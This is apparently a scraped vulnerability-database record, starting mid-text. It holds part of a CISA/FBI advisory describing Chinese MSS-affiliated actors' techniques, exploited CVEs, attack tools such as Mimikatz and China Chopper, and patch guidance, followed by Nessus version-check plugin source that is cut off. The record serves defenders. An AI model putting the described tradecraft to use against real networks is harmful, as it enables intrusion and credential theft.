programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:27:11", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than 9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Pulse Connect Secure < 9.1R11.4 (SA44784)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA44784.NASL", "href": "https://www.tenable.com/plugins/nessus/148847", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148847);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-22893\",\n \"CVE-2021-22894\",\n \"CVE-2021-22899\",\n \"CVE-2021-22900\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0207-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0024\");\n\n script_name(english:\"Pulse Connect Secure < 9.1R11.4 (SA44784)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than\n9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass\nvulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect\nSecure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Connect Secure version 9.1R11.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22894\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22893\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\n# from https://www-prev.pulsesecure.net/techpubs/pulse-connect-secure/pcs/9.1rx/\n# 9.1R11.3 is 9.1.11.12173\n# 9.1R11.4 is 9.1.11.12319\nconstraints = [\n {'min_version':'9.0.3', 'max_version':'9.1.11.12173', 'fixed_display':'9.1R11.4 (9.1.11.12319)'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:04:09", "description": "According to its self-reported version, the remote SonicWall Secure Mobile Access is affected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands. \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-02-03T00:00:00", "type": "nessus", "title": "SonicWall Secure Mobile Access Remote Code Execution (SNWLID-2021-0001)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20016"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:sonicwall:sma_100_firmware"], "id": "SONICWALL_SMA_SNWLID-2021-0001.NASL", "href": "https://www.tenable.com/plugins/nessus/146091", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146091);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-20016\");\n script_xref(name:\"IAVA\", value:\"2021-A-0065-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0006\");\n\n script_name(english:\"SonicWall Secure Mobile Access Remote Code Execution (SNWLID-2021-0001)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote SonicWall Secure Mobile Access is affected by a remote code\nexecution vulnerability. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary commands. \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5956a722\");\n # https://www.sonicwall.com/support/product-notification/urgent-patch-available-for-sma-100-series-10-x-firmware-zero-day-vulnerability-updated-feb-3-2-p-m-cst/210122173415410/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?421bba7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 10.2.0.5-29sv or later.\");\n 